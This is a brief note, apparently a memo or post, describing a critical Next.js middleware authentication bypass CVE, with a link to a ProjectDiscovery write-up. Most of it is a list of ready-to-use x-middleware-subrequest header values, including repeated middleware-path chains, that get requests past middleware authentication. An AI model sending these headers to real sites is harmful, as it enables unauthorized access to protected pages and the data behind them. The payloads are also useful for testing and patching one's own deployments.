A 9.1 CVE that bypasses all middle-ware authentication by adding a x-middleware-subrequest: middleware
header to your GET requests.
List of requests
https://projectdiscovery.io/blog/nextjs-middleware-authorization-bypass
x-middleware-subrequest: middleware
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/dashboard/panel/_middleware
x-middleware-subrequest: src/middleware
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware